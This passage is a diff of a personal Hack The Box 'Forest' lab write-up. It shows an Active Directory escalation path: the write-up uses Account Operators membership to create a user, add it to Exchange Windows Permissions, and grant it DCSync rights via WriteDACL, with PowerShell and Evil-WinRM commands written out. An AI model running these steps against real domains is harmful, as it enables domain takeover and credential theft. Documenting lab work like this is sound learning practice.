wither/obsidian-notes/05-Boxes/HTB/Forest.md

 LIMIT 1000
 ```

-Analysis revealed `svc-alfresco`'s membership in `Account Operators`, which grants permission to create users and modify group memberships for non-protected groups.
-This membership enabled adding users to `Exchange Windows Permissions`, which maintains `WriteDACL` privileges over the domain root - a configuration necessary for Exchange functionality but exploitable for privilege escalation.
+Bloodhound revealed that `svc-alfresco` was a part of the "Account Operators" group.
+This group can create users and add them to most groups, including "Exchange Windows Permissions".
+That group has `WriteDACL` permissions on the domain - normally needed for Exchange to work, but it creates a path to DCSync..
 ![[Pasted image 20250615014133.png]]
-To perform the DCSync attack, I firstly created a new credential object and domain user account called "wither"
+To perform the DCSync attack, I firstly created a new credential object and domain user account called "`wither`".
 ```powershell
 $SecPass = ConvertTo-SecureString 'password' -AsPlainText -Force
 $Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\\wither', $SecPass)
 New-ADUser -Name "wither" -SamAccountName "wither" -AccountPassword $SecPass -Enabled $true
 ```

-Then added it to the "Exchange Windows Permissions" group.
+The "Account Operators" membership of `svc-alfresco` allowed me to add `wither` to the "Exchange Windows Permissions" group.
 ```powershell
 Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members wither
 ```

-So I could then give it DCSync permissions.
+This provided the `WriteDACL` privileges I needed to grant it DCSync rights.
 ```powershell
 *Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -PrincipalIdentity wither -Rights DCSync -TargetIdentity "DC=htb,DC=local" -Credential $Cred -Verbose